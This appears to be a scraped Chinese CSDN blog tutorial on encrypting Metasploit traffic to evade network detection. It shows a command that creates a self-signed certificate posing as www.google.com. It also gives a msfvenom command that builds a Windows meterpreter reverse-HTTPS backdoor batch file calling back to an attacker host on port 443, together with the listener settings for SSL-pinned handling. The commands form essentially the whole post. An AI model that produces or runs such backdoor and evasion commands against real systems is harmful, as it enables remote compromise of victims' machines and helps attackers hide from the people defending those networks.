MSF流量加密躲避检测

最新推荐文章于 2024-04-15 16:00:17 发布
最新推荐文章于 2024-04-15 16:00:17 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: 渗透测试 红队攻击指南 流量加密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/114806470
版权

  OpenSSL 创建SSL/TLS证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

生成后门

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.31.96 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat

设置监听器

配置监听器需要使用两个附加选项。这是为了通知处理程序它将使用的证书(与有效负载相同),并在接受到链接时执行SSL证书验证。

HandlerSSLCert

StagerVenfySSLCert

set payload windows/meterpreter/reverse_winhttps
set LHOST 192.168.31.96
set LPORT 443
set HandlerSSLCert /home/kali/桌面/MSF/www.google.com.pem
set StagerVerifySSLCert true
exploit

查看加密数据

 

 

 

 

 

 

 

火中的冰~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全进阶篇之流量加密(十三章-2)MSF流量加密躲避检测
划水的小白白
05-19 3258
文章目录一、为什么要加密二、创建证书三、上线MSF四、抓取流量测试五、不上线的情况5.1、经过测试win7系统无法上线。5.2、看看配置是否正确 一、为什么要加密 为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具, 专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征, 像 metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来, 所以做好流量加密,就能避免审计工具检测出来。 大概过程: 使用openssl生成加密正常, msf生成木马的时候将证书加进去, 设置
MSF&CobaltStrik流量隐藏
qq_45434762的博客
12-05 1308
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
红队隧道加密MSF流量加密(二)
xf555er的博客
11-26 2046
如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测这里介绍使用OpenSSL对MSF流量进行加密
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
黄乔国PHP
03-22 1万+
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
流量检测技术研究
10-31
总的来说,流量检测技术对于防止msf横向攻击至关重要。通过对网络流量的深入分析,结合有效的检测工具如Snort和ET规则,可以提高网络的安全性。同时,理解Meterpreter的运作机制和Metasploit的攻击方式,可以帮助...
ssl弱加密算法套件检测工具
01-18
该工具适用于安全渗透测试人员,可以用来检测加密算法套件,
元器件应用中的MSF系列MSF7905集成电路实用检测数据
11-20
在实际应用中,MSF7905的性能检测至关重要,以确保其正常工作并提供可靠电源。对于检测,通常会使用MF14型三用表,这是一种多功能的电工仪表,可以进行电压和电阻测量。在对MSF7905进行检测时,应将三用表设置为直流...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
元器件应用中的MSF系列MSF7907集成电路实用检测数据
11-20
MSF7907是-7V电源稳压电路,为3脚单列直插式塑料封装,在索尼HCD-700/V800型VCD影碟机电路IC1004上的正常工作电压典型检测数据如表8所列,用MF14型三用表测得(DC挡)。 表 MSF7907在索尼HCD-700/V800型VCD影碟机...
无人驾驶算法学习:多传感器融合MSF算法
02-24
本文的多传感器融合是建立在读懂《Quaternionkinematicsfortheerror-stateKalman?lter》基础上的,是一种相机和IMU融合的理论,里面讲解了IMU的误差状态运动方程构建。误差状态四元数,是有开源的程序的,但是它是集成在rtslam里面的,不方便提取出来使用。但还有另外一个开源的程序,ETH的MSF,可以比较方便地用在自己的工程里面,并且它的理论与误差状态四元数很接近,稍微有点不同,所以MSF开源程序就成了一个不错的选择。所以本人研究了ETH的两篇文章:《VisionBasedNavigationforMicroHelicopters》和《ARobusta
MSF -基于扩展卡尔曼滤波器 (EKF) 的多传感器融合 模块化框架_C++_代码_相关文件_下载
07-13
描述 基于EKF的时延补偿单传感器和多传感器融合框架。 更多详情、使用方法,请下载后细读README.md文件
msf后门流量分析
最新发布
2301_76227305的博客
04-15 1572
以上就是msf后门流量特征啦最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
应急响应-MSF流量分析&模式模块&特征提取
siu~
04-13 1108
战后-流量分析-MSF
msf流量通讯特征修改
qq_52839196的博客
02-07 4460
msf流量通讯特征修改
使用msf(Metasploit Framework)检测MS17-010(永恒之蓝)
热门推荐
sanMu_blog的博客
07-02 1万+
今天是入职的第一天,还是有点忐忑,新地点新事物,希望自己的选择没有错,努力!废话不多说,入职后被安排的第一件事情,就是在Ubuntu环境下搭建msf(metasploit framework渗透框架),然后下午去做渗透测试。个人习惯Windows系统,于是在VMware内安装Ubuntu,由于电脑有VMware,具体的安装就不说了,Ubuntu安装教程本人参考的是Ubuntu安装教程,msf教程是...
流量特征分析——蚁剑、菜刀、冰蝎
Sgirll的博客
07-22 5978
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。网络管理员和安全专家可以根据这些特征来识别和监测潜在的攻击活动,并及时采取相应的防护措施。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。本文将重点研究菜刀、蚁剑和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。蚁剑(AntSword)是一款功能强大的跨平台渗透测试工具,被广泛用于攻击和渗透测试活动。
常见Webshell&重大漏洞的流量特征(附解密流量工具)
Python_0011的博客
11-10 6120
攻防演练中,经常会看到一些加密流量,又分不清楚是不是误报,本文总结了一些常见的流量特征,附流量解密工具。
无人驾驶算法学习(六):多传感器融合MSF算法
蒋成的博客
05-06 1万+
文章目录1.引言2. 算法理论2.1 MSF基本模型2.2 预测2.3 测量与更新3. 核心代码分析4. 代码实战 1.引言 本文的多传感器融合是建立在读懂《Quaternion kinematics for the error-state Kalman filter》基础上的 ,是一种相机和IMU融合的理论,里面讲解了IMU的误差状态运动方程构建。误差状态四元数,是有开源的程序的,但是它是集成在r...
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
11-16
反朔源是指攻击者在攻击时使用了一些技术手段来隐藏攻击者的真实IP地址,使得受害者***指在网络传输过程中对数据进行加密,使得攻击者无法窃取数据或者窃取到的数据无法被解密。常见的流量加密技术包括SSL、TLS等。 CS和MSF是两种常见的渗透测试工具,分别是Cobalt Strike和Metasploit Framework的缩写。这两个工具都可以用于渗透测试和红队行动。 证书指纹是指数字证书中的一个唯一标识,可以用于验证数字证书的真实性。常见的证书指纹算法包括SHA-1、SHA-256等。 C2项目是指命令与控制(Command and Control)项目,是指攻击者通过控制恶意软件的C2服务器来控制受害者的计算机。 CDN域前置是指攻击者通过在攻击流量中添加CDN前置节点,来绕过一些安全防护措施,使得攻击流量更难被检测和阻止。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值